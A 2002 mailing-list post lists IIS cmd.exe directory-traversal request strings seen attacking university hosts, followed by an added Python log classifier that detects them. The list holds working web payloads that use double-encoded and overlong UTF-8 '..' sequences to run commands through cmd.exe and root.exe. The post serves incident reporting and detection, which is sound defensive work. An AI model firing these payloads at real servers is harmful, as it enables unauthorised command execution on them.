IIS cmd.exe attack strings

Mike Iglesias iglesias at draco.acs.uci.edu
Tue Jun 11 15:57:16 GMT 2002


Below you'll find a list of the IIS cmd.exe attack strings that we've seen
over the last couple of days.

Some of the attacks ended in "dir+c:/" instead of "dir+c:\"; where the
ones ending in "/" were a duplicate of the one ending in "\", I removed
the one ending in "/".  Some have no drive/directory spec.

We are seeing some where one attacker will attack a few thousand hosts here,
and others where one attacker will attack one or two hosts here and then
go away.

Over the last couple of days, ~600 different systems have tried
cmd.exe exploits against systems here.  It looks like the attack
program may have around 25-30 different attacks to try, but it's hard
to tell for sure (I'm going off of the number of tries one
attacker tried against one system here).


Mike Iglesias                          Internet:    iglesias at draco.acs.uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069

GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /MSADC/root.exe?/c+dir 
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /c/winnt/system32/cmd.exe?/c+dir 
GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/ 
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/ 
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:/ 
GET /d/winnt/system32/cmd.exe?/c+dir 
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /msdac/root.exe?/c+dir+c:\
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:/ 
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%255c../winnt/system32/cmd.exe?\c+dir+c:\inetpub\scripts 
GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/root.exe?/c+dir+c:\
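
The following is an added example, not part of the original post or the author's code: a Python log classifier that percent-decodes each request path to a fixed point, folds the overlong UTF-8 forms seen in the list, and then checks for ".." segments and the cmd.exe/root.exe names. The tag names, the five-round decode limit and the lenient fold rule are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Byte sequences that are never well-formed UTF-8: C0/C1 lead bytes and the
# overlong 3- to 6-byte prefixes. Trailing bytes are deliberately unchecked.
OVERLONG = re.compile(
    rb"[\xc0\xc1].|\xe0[\x80-\x9f].|\xf0[\x80-\x8f]..|"
    rb"\xf8[\x80-\x87]...|\xfc[\x80-\x83]....", re.DOTALL)
DOTDOT = re.compile(rb"(^|/)\.\.(/|$)")
SHELL = re.compile(rb"/(cmd|root)\.exe$")   # the two names in the list above

def _fold(m):
    # Assumption of this example: a lenient decoder keeps only the low
    # payload bits, so %c0%af and %c1%1c both collapse to a separator.
    s = m.group()
    return bytes([((s[-2] & 1) << 6) | (s[-1] & 0x3F)])

def classify(request_line):
    """Return a set of findings for one 'METHOD target [version]' line."""
    parts = request_line.split()
    if len(parts) < 2:
        return set()
    raw = parts[1].split("?", 1)[0].encode("latin-1", "replace")
    tags, rounds = set(), 0
    while rounds < 5:                 # percent-decode to a fixed point
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw, rounds = decoded, rounds + 1
    if rounds > 1:
        tags.add("multi-encoded")     # e.g. %255c -> %5c -> backslash
    folded = OVERLONG.sub(_fold, raw)
    if folded != raw:
        tags.add("overlong-utf8")
    path = folded.replace(b"\\", b"/").lower()
    if DOTDOT.search(path):
        tags.add("traversal")
    if SHELL.search(path):
        tags.add("shell-binary")
    return tags

if __name__ == "__main__":
    # Two request lines from the list above plus one constructed benign line.
    for line in ("GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
                 "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:/",
                 "GET /docs/100%25-guide.html HTTP/1.0"):
        print(sorted(classify(line)), line)
```

A request is worth alerting on when it carries "traversal" together with "shell-binary"; "multi-encoded" and "overlong-utf8" on their own still mark a client that is probing the decoder.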


